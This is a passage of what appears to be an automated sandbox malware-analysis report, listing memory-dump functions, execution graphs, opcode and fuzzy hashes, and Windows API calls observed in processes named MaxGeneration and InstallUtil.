                                                                        • Instruction Fuzzy Hash: 05B01230510204CE8F16DE00C1C0468BBB0FF8164031080EEC0031E027C730C9C7DF02
                                                                        Function 03274545 Relevance: 5.0, Strings: 4, Instructions: 6COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TJcq$jjjjjj$$^q$$^q
                                                                        • API String ID: 0-672324049
                                                                        • Opcode ID: 5387cb13b564b56b01905dc4232222d7a30f4fa20651d3024492f76c7fe4c2a5
                                                                        • Instruction ID: c1a0f9041b7c0039c7b2b4c88ae140739e516e59e48d3311a5621c90adb28742
                                                                        • Opcode Fuzzy Hash: 5387cb13b564b56b01905dc4232222d7a30f4fa20651d3024492f76c7fe4c2a5
                                                                        • Instruction Fuzzy Hash: 27B09270112200CE8B06EA108184420B7B0FB8164031080AEC0030E02AC7308987EA06
                                                                        Function 0327458E Relevance: 5.0, Strings: 4, Instructions: 6COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TJcq$jjjjjj$$^q$$^q
                                                                        • API String ID: 0-672324049
                                                                        • Opcode ID: 11a8eb413d5fce00d1d7600ea39e29d5136ddd3598f79b572cce118124aa4725
                                                                        • Instruction ID: c3a856d7fbe97646d2c63bb7b4bda02c105ed6f147ad144af62fc05b07860ff3
                                                                        • Opcode Fuzzy Hash: 11a8eb413d5fce00d1d7600ea39e29d5136ddd3598f79b572cce118124aa4725
                                                                        • Instruction Fuzzy Hash: F8B0926141E784CEC7039A9148D12607E506BA2281B18C0EA84850E08BC1A08885E721
                                                                        Function 032745B1 Relevance: 5.0, Strings: 4, Instructions: 5COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TJcq$jjjjjj$$^q$$^q
                                                                        • API String ID: 0-672324049
                                                                        • Opcode ID: 3056eee5497e2f3a8fe9681bb67380aa5255d18633eb5ebd09d496e0339cb3e3
                                                                        • Instruction ID: b1a9230496f55c2439ed7e1c8f9b34f1328800774486278cf02a825537cd60e1
                                                                        • Opcode Fuzzy Hash: 3056eee5497e2f3a8fe9681bb67380aa5255d18633eb5ebd09d496e0339cb3e3
                                                                        • Instruction Fuzzy Hash: 3FB09260805349CBDB118E8182D0340BB60BB60248F18C3B9C8480D807C328C58697A0

                                                                        Execution Graph

                                                                        Execution Coverage:7.7%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:78
                                                                        Total number of Limit Nodes:10
                                                                        execution_graph 13404 1646540 13405 1646586 GetCurrentProcess 13404->13405 13407 16465d1 13405->13407 13408 16465d8 GetCurrentThread 13405->13408 13407->13408 13409 1646615 GetCurrentProcess 13408->13409 13410 164660e 13408->13410 13411 164664b 13409->13411 13410->13409 13412 1646673 GetCurrentThreadId 13411->13412 13413 16466a4 13412->13413 13414 1644668 13419 1644676 13414->13419 13417 1644704 13420 1646de0 13419->13420 13421 1646e05 13420->13421 13429 1646edf 13421->13429 13433 1646ef0 13421->13433 13422 16446e9 13425 164421c 13422->13425 13426 1644227 13425->13426 13441 1648560 13426->13441 13428 1648806 13428->13417 13430 1646f17 13429->13430 13431 1646ff4 13430->13431 13437 1646414 13430->13437 13434 1646f17 13433->13434 13435 1646414 CreateActCtxA 13434->13435 13436 1646ff4 13434->13436 13435->13436 13438 1647370 CreateActCtxA 13437->13438 13440 1647433 13438->13440 13442 164856b 13441->13442 13445 1648580 13442->13445 13444 16488dd 13444->13428 13446 164858b 13445->13446 13449 16485b0 13446->13449 13448 16489ba 13448->13444 13450 16485bb 13449->13450 13453 16485e0 13450->13453 13452 1648aad 13452->13448 13454 16485eb 13453->13454 13456 1649e93 13454->13456 13459 164bed1 13454->13459 13455 1649ed1 13455->13452 13456->13455 13465 164df70 13456->13465 13460 164beda 13459->13460 13462 164be91 13459->13462 13469 164bf08 13460->13469 13472 164bef8 13460->13472 13461 164bee6 13461->13456 13462->13456 13466 164df91 13465->13466 13467 164dfb5 13466->13467 13480 164e120 13466->13480 13467->13455 13475 164bff0 13469->13475 13470 164bf17 13470->13461 13473 164bf17 13472->13473 13474 164bff0 GetModuleHandleW 13472->13474 13473->13461 13474->13473 13476 164c011 13475->13476 13477 164c034 13475->13477 13476->13477 13478 164c238 GetModuleHandleW 13476->13478 13477->13470 13479 164c265 13478->13479 13479->13470 13481 164e12d 13480->13481 13483 164e166 13481->13483 13484 164c464 13481->13484 13483->13467 13485 164c46f 13484->13485 13486 164e1d8 13485->13486 13488 164c498 13485->13488 13489 164c4a3 13488->13489 13490 16485e0 3 API calls 13489->13490 13491 164e247 13490->13491 13494 164e2c0 13491->13494 13492 164e256 13492->13486 13495 164e2ee 13494->13495 13496 164c530 GetFocus 13495->13496 13497 164e317 13495->13497 13499 164e3bf 13495->13499 13496->13497 13498 164e3ba KiUserCallbackDispatcher 13497->13498 13497->13499 13498->13499 13500 1646788 13501 16467df DuplicateHandle 13500->13501 13502 164681e 13501->13502

                                                                        Executed Functions

                                                                        Function 01646540 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 536 1646540-16465cf GetCurrentProcess 540 16465d1-16465d7 536->540 541 16465d8-164660c GetCurrentThread 536->541 540->541 542 1646615-1646649 GetCurrentProcess 541->542 543 164660e-1646614 541->543 544 1646652-164666d call 164670f 542->544 545 164664b-1646651 542->545 543->542 549 1646673-16466a2 GetCurrentThreadId 544->549 545->544 550 16466a4-16466aa 549->550 551 16466ab-164670d 549->551 550->551
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 016465BE
                                                                        • GetCurrentThread.KERNEL32 ref: 016465FB
                                                                        • GetCurrentProcess.KERNEL32 ref: 01646638
                                                                        • GetCurrentThreadId.KERNEL32 ref: 01646691
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1887198734.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_1640000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: ca0985aa52ae626e8a7a098ce004dce912cd43bc4200ae6bcb26a18aa24c4a86
                                                                        • Instruction ID: ddd4a1e6e8c3507e96fbb6804c2a3f5fce071742be2857ac62238cbc892a649f
                                                                        • Opcode Fuzzy Hash: ca0985aa52ae626e8a7a098ce004dce912cd43bc4200ae6bcb26a18aa24c4a86
                                                                        • Instruction Fuzzy Hash: F85144B0900209CFDB14DFAAD948B9EBFF1BB49314F208469E419A7360DB34A984CF65
                                                                        Function 01647364 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 580 1647364-1647431 CreateActCtxA 582 1647433-1647439 580->582 583 164743a-1647494 580->583 582->583 590 1647496-1647499 583->590 591 16474a3-16474a7 583->591 590->591 592 16474b8 591->592 593 16474a9-16474b5 591->593 594 16474b9 592->594 593->592 594->594
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 01647421
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1887198734.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_1640000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID: U
                                                                        • API String ID: 2289755597-3372436214
                                                                        • Opcode ID: 0fbbe2e6068f52bfafaaf7aebc8f07502294dc873cb9f69dd32456df5b7b4ce4
                                                                        • Instruction ID: 60d3d3aa0032464c2895b8db1a6cb8dfd239f4d5e43da1915e239f1aa2b1a4b1
                                                                        • Opcode Fuzzy Hash: 0fbbe2e6068f52bfafaaf7aebc8f07502294dc873cb9f69dd32456df5b7b4ce4
                                                                        • Instruction Fuzzy Hash: EF41D1B1C00619CFDB24DFA9C844BDEFBB6BF48314F24806AD408AB255DB755985CF91
                                                                        Function 0164BFF0 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 596 164bff0-164c00f 597 164c011-164c01e call 164af60 596->597 598 164c03b-164c03f 596->598 604 164c034 597->604 605 164c020 597->605 600 164c041-164c04b 598->600 601 164c053-164c094 598->601 600->601 607 164c096-164c09e 601->607 608 164c0a1-164c0af 601->608 604->598 651 164c026 call 164c698 605->651 652 164c026 call 164c689 605->652 607->608 609 164c0b1-164c0b6 608->609 610 164c0d3-164c0d5 608->610 612 164c0c1 609->612 613 164c0b8-164c0bf call 164af6c 609->613 615 164c0d8-164c0df 610->615 611 164c02c-164c02e 611->604 614 164c170-164c230 611->614 617 164c0c3-164c0d1 612->617 613->617 646 164c232-164c235 614->646 647 164c238-164c263 GetModuleHandleW 614->647 618 164c0e1-164c0e9 615->618 619 164c0ec-164c0f3 615->619 617->615 618->619 620 164c0f5-164c0fd 619->620 621 164c100-164c109 call 164af7c 619->621 620->621 627 164c116-164c11b 621->627 628 164c10b-164c113 621->628 629 164c11d-164c124 627->629 630 164c139-164c146 627->630 628->627 629->630 632 164c126-164c136 call 164af8c call 164af9c 629->632 637 164c148-164c166 630->637 638 164c169-164c16f 630->638 632->630 637->638 646->647 648 164c265-164c26b 647->648 649 164c26c-164c280 647->649 648->649 651->611 652->611
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0164C256
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1887198734.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_1640000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: c208c85c361358de4300644c871eb537a1bc82460cfbef4efb2a40b59c9fbb75
                                                                        • Instruction ID: 0bef308421bf7c746b1ab6a8f495802a788cedd98fff39dada95a94a3b7e1271
                                                                        • Opcode Fuzzy Hash: c208c85c361358de4300644c871eb537a1bc82460cfbef4efb2a40b59c9fbb75
                                                                        • Instruction Fuzzy Hash: 008135B0A01B059FD724DF69D94075ABBF5FF88604F008A2ED48ADBB50D775E84ACB90
                                                                        Function 01646414 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 653 1646414-1647431 CreateActCtxA 656 1647433-1647439 653->656 657 164743a-1647494 653->657 656->657 664 1647496-1647499 657->664 665 16474a3-16474a7 657->665 664->665 666 16474b8 665->666 667 16474a9-16474b5 665->667 668 16474b9 666->668 667->666 668->668
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 01647421
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1887198734.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_1640000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 22ebde8f22415a0116dacdcea9892be086e3260daaaa1116cf3acbe336e11024
                                                                        • Instruction ID: 9450c3237ff864cb6f48637b114deb52f0e97eb38900e3b59325e6591b3c3756
                                                                        • Opcode Fuzzy Hash: 22ebde8f22415a0116dacdcea9892be086e3260daaaa1116cf3acbe336e11024
                                                                        • Instruction Fuzzy Hash: 3241CEB1C0061DCBDB24DFA9C844B9EBBF6BF48314F24806AD408AB255DB756986CF91
                                                                        Function 01646780 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 670 1646780-1646781 671 1646783-16467dc 670->671 672 16467df-164681c DuplicateHandle 670->672 671->672 674 1646825-1646842 672->674 675 164681e-1646824 672->675 675->674
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0164680F
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1887198734.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_1640000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: c0588834326c5d6b84b413e19ffda8855fd31896419fa7de3a884235dc34a43f
                                                                        • Instruction ID: 895a390e4df354ca68eebde742af574e8da37545fefabc85eec4b8f9f94d4df8
                                                                        • Opcode Fuzzy Hash: c0588834326c5d6b84b413e19ffda8855fd31896419fa7de3a884235dc34a43f
                                                                        • Instruction Fuzzy Hash: 7421E3B59002189FDB10CF9AD984AEEFFF5FB48320F14842AE954A7351D378A940CFA5
                                                                        Function 01646788 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 678 1646788-164681c DuplicateHandle 680 1646825-1646842 678->680 681 164681e-1646824 678->681 681->680
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0164680F
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1887198734.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_1640000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 6f063f138d3bc667bc94b12b1da56573624b9fd4c78923c11ae12d410889182a
                                                                        • Instruction ID: a6acec346a898277b5349df95f5cbb438073aaf2fdec0defbfeb1213b11424d1
                                                                        • Opcode Fuzzy Hash: 6f063f138d3bc667bc94b12b1da56573624b9fd4c78923c11ae12d410889182a
                                                                        • Instruction Fuzzy Hash: F621E4B59002089FDB10CF9AD984ADEFFF4FB48320F14801AE954A7350D374A940CFA5
                                                                        Function 0164C1F0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 684 164c1f0-164c230 685 164c232-164c235 684->685 686 164c238-164c263 GetModuleHandleW 684->686 685->686 687 164c265-164c26b 686->687 688 164c26c-164c280 686->688 687->688
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0164C256
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1887198734.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_1640000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 4767074e8d3871be544e69b360019230559ffd3a015fb3bb760f04538373ced8
                                                                        • Instruction ID: 7cab7742f856bae2abe978c3251ee1cde1b1a1d9b7352296815741f9b25ab7c7
                                                                        • Opcode Fuzzy Hash: 4767074e8d3871be544e69b360019230559ffd3a015fb3bb760f04538373ced8
                                                                        • Instruction Fuzzy Hash: B7110FB5C002498FDB10DF9AD844ADFFBF4AB88224F10842AD429A7310C3B5A545CFA5
                                                                        Function 0129D4D8 Relevance: .1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1883776905.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_129d000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c98b81ba5547f5cdaaee6632dbd72e433c7ede98fa40003c96d09514f5009327
                                                                        • Instruction ID: 5ea32a7e6d2c50f8c05945ad8ab86758cda6f1e6b6164babaa69dd95e4b2b51e
                                                                        • Opcode Fuzzy Hash: c98b81ba5547f5cdaaee6632dbd72e433c7ede98fa40003c96d09514f5009327
                                                                        • Instruction Fuzzy Hash: 65210371510208DFDF05DF9CE9C0B26BFA5FB88318F208169EA094B256C336D856DBA2
                                                                        Function 012AD01C Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1883954440.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_12ad000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5dec96502a32a74f86f852fd373e6350494b27d9a8ee8dc5991a95211f495148
                                                                        • Instruction ID: ffa64ab6cebec9c618dfeb10ee761fc0a0bf756fde56c6242040ee7c109ec5f7
                                                                        • Opcode Fuzzy Hash: 5dec96502a32a74f86f852fd373e6350494b27d9a8ee8dc5991a95211f495148
                                                                        • Instruction Fuzzy Hash: CC216470294208DFCB11DF68D9C0B26BFA1FB88314F60C56DD90A4B656C37BD407CA61
                                                                        Function 012AD006 Relevance: .1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1883954440.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_12ad000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4ce8673a6f43958d6b80a0f5c8b328d8298d3819c10128f122ceeb6f3c9a8c0d
                                                                        • Instruction ID: a6c97783be22603693a32aa6bc9802ded76a8556a328c31105b4246d2312d2b7
                                                                        • Opcode Fuzzy Hash: 4ce8673a6f43958d6b80a0f5c8b328d8298d3819c10128f122ceeb6f3c9a8c0d
                                                                        • Instruction Fuzzy Hash: 1221B0714483849FCB03CF24D994711BF71EB46314F28C5DAD9498F6A7C33A980ACB62
                                                                        Function 0129D4D3 Relevance: .1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1883776905.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_129d000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                        • Instruction ID: c6562278e40e6dca4ef6c0c2adfe04aaf5d4b01840090766c6c3af0b2dfc2671
                                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                        • Instruction Fuzzy Hash: E911E172404244CFCF12CF48D5C4B16BF71FB84318F24C2A9D9090B256C33AD45ADBA1